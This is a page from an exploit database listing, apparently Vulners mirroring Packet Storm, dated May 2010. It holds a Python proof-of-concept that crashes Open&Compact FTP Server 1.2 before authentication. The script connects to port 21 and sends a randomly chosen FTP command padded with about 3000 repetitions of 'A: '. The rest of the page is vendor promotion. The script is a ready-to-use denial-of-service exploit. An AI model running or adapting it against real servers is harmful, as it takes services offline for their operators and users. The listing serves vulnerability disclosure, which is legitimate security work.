Lucene search
K

Open And Compact FTP Server 1.2 Denial Of Service

🗓️ 26 May 2010 00:00:00Reported by Dr_IDEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Open&Compact Ftp Server 1.2 Denial Of Service attack on Windows

Code
`#!/usr/bin/python  
###################################################################  
#  
# Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service  
# Coded By: Dr_IDE  
# Found By: Ma3sTr0-Dz  
# Date: May 24, 2010  
# Download: http://sourceforge.net/projects/open-ftpd/  
# Tested: Windows 7  
#  
###################################################################  
  
import random, socket, sys  
  
host = (sys.argv[1])  
buff = ("A: " * 3000)  
cmds = ['ABOR', 'APPE', 'ALLO', 'PORT', 'USER', 'PASS', 'PASV', 'MKD', 'SIZE']  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print ("\r\n[i] Connecting to: " + host +"\r\n")  
s.connect((host, 21))  
d=s.recv(1024)  
print (d)  
magic=random.choice(cmds)  
print ("[*] Finding vulnerable commands.\r\n")  
print ("[*] Performing some kind of complex calculations...\r\n")  
print ("[*] Crashing server with command: " + magic + "\r\n")  
s.send(magic + " " + buff + '\r\n')  
print ("[i] Server Down")  
s.close()  
  
# End  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 May 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
17